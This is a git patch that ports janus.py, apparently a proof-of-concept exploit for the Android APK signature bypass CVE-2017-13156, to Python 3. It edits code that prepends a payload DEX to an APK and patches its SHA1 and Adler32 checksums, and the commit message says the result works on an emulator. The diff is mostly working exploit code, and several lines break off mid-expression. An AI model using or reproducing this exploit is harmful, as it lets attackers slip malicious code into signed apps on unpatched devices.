From 5b5e70690cc6c3e18ae9762358075275c02c63fe Mon Sep 17 00:00:00 2001 From: Disane Date: Thu, 14 Dec 2017 12:01:55 +0100 Subject: [PATCH] Now works on Python 3.6+ + Added original __author___ name + Added commentary + Ported code to execute on Python 3.6.1+: + memoryview used to calculate adler32 checksum + end of central directory magic bytes are now passed to rfind() as bytes instead of strings + Tested resulting APK on emulator AOSP Android OS ver. 5.1 x86-64 and it works! --- CVE-2017-13156/janus.py | 57 ++++++++++++++++++++++++++++++++++++----- 1 file changed, 51 insertions(+), 6 deletions(-) diff --git a/CVE-2017-13156/janus.py b/CVE-2017-13156/janus.py index 92856cc..f5b11ee 100644 --- a/CVE-2017-13156/janus.py +++ b/CVE-2017-13156/janus.py @@ -5,14 +5,38 @@ import hashlib from zlib import adler32 +__author__ = 'V-E-O' +__github__ = 'https://github.com/V-E-O' + + +''' +Edited by Disane @ https://github.com/Disane ++ Added commentary ++ Ported code to execute on Python 3.6.1+: + + memoryview used to calculate adler32 checksum + + end of central directory magic bytes are now passed to rfind() as bytes + instead of strings ++ Tested resulting APK on emulator AOSP Android OS ver. 5.1 x86-64 + and it works! +''' + + def update_checksum(data): + # acquire SHA1 algo m = hashlib.sha1() m.update(data[32:]) + # patch SHA1 inside prepended DEX data[12:12+20] = m.digest() - v = adler32(buffer(data[12:])) & 0xffffffff + # pass everything (except for the DEX header and Adler32 section) + # of the payload DEX to the Adler32 checksum algo + # mask to cut down anything past 32 bits + v = adler32(memoryview(data[12:])) & 0xffffffff + # convert Adler32 result to little endian + # and write it back into the payload data[8:12] = struct.pack(" PK\x05\x06 + cd_end_addr = apk_data.rfind(b'\x50\x4b\x05\x06') + # unpack little endian aligned data + # and look for central directory size in the end of directory cd_start_addr = struct.unpack("